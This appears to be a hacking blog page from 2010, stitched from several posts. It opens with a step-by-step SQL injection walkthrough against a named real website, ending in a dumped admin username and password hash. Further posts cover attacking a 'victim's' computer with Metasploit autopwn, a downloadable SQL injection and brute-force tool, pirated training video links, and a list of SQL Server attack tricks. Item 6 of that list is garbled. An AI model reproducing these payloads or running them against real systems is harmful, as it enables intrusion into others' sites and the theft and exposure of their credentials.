http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--

do that untill u get a error

It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--

that mean it only has 5 columns ..  because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--

like that ..

there sould be number pop up somewhere

we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5

5.0.67

ok now ..

let get the table names.. to do that u need to use this commands

group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--

we have the list of table here now

ok .. now we got this tables

http://www.allaboutcar.net/articles.php?topic=-3 
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

Admins

,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,
forum_c,gbook,

infopages,

jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,
users,ok we have the admin table here ..ok lets get the columns now .. to do that just chnage this
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

to
http://www.allaboutcar.net/articles.php?topic=-3 
union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

Now we have the columns

id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,
topic,author,id,ip,

date,id,title,

alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,
what,date,wid,name,

mail,title,

text,ip,

id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,

now lets put this togeter !!

Table : admins
Columns : id,nick,pass,

In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3

union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .
This Tutorial Is Only For Educational Purposes.
So Friends that all for this tutorial
Username : MaTySeK,

Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253
................................................................................................................... ..............................................
................................................................................................................... ..............................................
................................................................................................................... .............................................. 

Wednesday, October 13, 2010

How To Hack Victim,s Computer With Nmap And Metasploit

Today I am writing a tutorial on hacking with Nmap with Metasploit. First d/l Metasploit  from the official website,Link:
Code:
http://www.metasploit.com/ 
Let  all that install, and towards the end of the installation it will ask if you would like Nmap installed also, 
choose yes. Once you have that installed the  Metasploit screen will  open up as shown below...


Now type db_create

Once you have typed that type nmap

This loads nmap, as shown below....



You need to configure your scan now, I usually do a simple -sT -sV scan which will tell us the open ports and services running on the victims computer, Now type nmap -sT -sV xxx.xxx.xxx.x (X's being victims Ip number), Demonstrated below.



Now give it 5 minutes to complete the scan,Once that is complete if your lucky you should get a response like this...



This is basically a list of the open ports and services running on the target machine, Now the handy feature of the metasploit 3.3 framework is the autopwn feature, this basically searches and runs all matching exploits in the Metasploit database against the target machine and if successful will create a shell or similar privilege for the attacker.

Now once you have the nmap results delivered back to you showing the open ports and services type db_autopwn -p -t -e , From this point you will either have access to the victims computer through a successfully launched exploit or you will get a response saying the machine wasn't vulnerable to any of the exploits in the Metasploit database. Unfortunately on this particular machine I found it wasn't vulnerable as the image below proves.Good luck.

...........................................................................................................................................................................................
............................................................................................................................................................................................
............................................................................................................................................................................ ..............

Tuesday, October 12, 2010

SQL video tutorials by Microsoft Certified Systems Engineer

SQL video tutorials by Microsoft Certified Systems Engineer.

SQL tutorial video by Microsoft certified Systems Engineer
This Transact SQL tutorial video is instructed by Microsoft certified Systems Engineer and Database administrator Mark Long. In this tutorial, you will not only learn about this data definition, manipulation, and control language, but you will also become better prepared for the MCDBA certification. It will also help you become a better Database Administrator.
Mark Long begins by introducing you to the origins and capabilities of Transact SQL. He will give a brief history of databases and will cover some language basics, including scripts, batches, functions, and views. From there, he moves onto more advanced ideas by teaching you about TSQL tools, such as the Query Analyzer and the Enterprise Manager. He then goes into great depth explaining the 4 main commands: SELECT, INSERT, UPDATE, and DELETE. You will also learn about indexes, variables, and stored procedures.
Code:

http://rapidshare.com/files/272340425/videotraining_sql.part1.rar
http://rapidshare.com/files/272344282/videotraining_sql.part2.rar
...................................................................................................................................................... ........
...................................................................................................................................................... ........

Monday, October 11, 2010

Hack Websites With Sql Injection Tool By Pr0xy v2.2.0 + Video Demonstration

Injection tool by Pr0xY v2.2.0
Code:
+---------------------------------------+
+ Injection tool by Pr0xY +
+ Version 2.2.0 +
+---------------------------------------+

Examples to use:

*Mode(SQLi helper) : main.pl
*Mode(Blind helper): main.pl blind
*Mode(SQLi scanner): main.pl sis (automatic attack = 0 [0=false/1=true])*
*Mode(AdminFinder) : main.pl adminFinder
*Mode(FTP BF) : main.pl FTPbf
*Mode(MD5 BF) : main.pl MD5bf
*Mode(MD5 encode) : main.pl MD5en
*Mode(Hex) : main.pl hex
*Mode(Update) : main.pl update
*Mode(about) : main.pl about

Fast use:

-t Is the target
-mc Is the maximun columns to find
-p/pr0xy Is the proxy for use
-c Is the comment for the injection
-dt Is the data base type(0=Mysql, 1=MSSQL)
-h For help

Helper options:
Code:
Select an action:

0)Stop the scan
1)Get Databases
2)Get Tables
3)Get Columns
4)Dump data
5)Load file
6)MySQL.user
7)Save structure

In this version I made sure to improve user convenience and efficiency of dump

Download:
http://www.learnhtml.co.il/yoni_project.rar

Video demonstrates using "Quick Launch":
http://www.youtube.com/watch?v=Da57SFQmxUA
............................................................................ ...................................................................................................
............................................................................ ...................................................................................................
............................................................................ ...................................................................................................  

Hack Websites Top 10 Tricks to Exploit SQL Servers

Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.testing


1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield?s Port Report shows just how many systems are sitting out there waiting to be attacked. I don?t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.



2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or thedatabase system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assesment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.?s NGSSquirrel for SQL Server (for database-specific scanning). They?re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

Figure 1: Common SQL injection vulnerabilities found using WebInspect.



3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database system. Chip Andrews? SQLPing v 2.5 is a great tool to use to look for SQL server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren?t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.



4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS software Ltd. also have this capability.



5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access. 

Figure 2: SQL Server vulnerability exploitable using Metasploit?s MSFConsole
.

6. SQL injection
SQL injection attacks are executed via front-end Web applications that don?t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informativeprefer to perform the follow-through using an automated tool, such as SPI Dynamics? SQL Injector, shown in Figure 3.


Figure 3: SPI Dynamics? SQL Injector tool automates the SQL injection process. errors, commands being executed and more. These attacks can be carried out manually ? if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I



7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn?t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that?s where Absinthe, shown in Figure 4, comes in handy.


Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.



8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you?ll find a discussion about reverse engineering ploys.


9.
Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors ? such as ?Incorrect syntax near? ? leaking from publicly accessible systems. Several Google queries are available at Johnny Long?s Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web Servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google?s ?site:? operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code
Source Code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................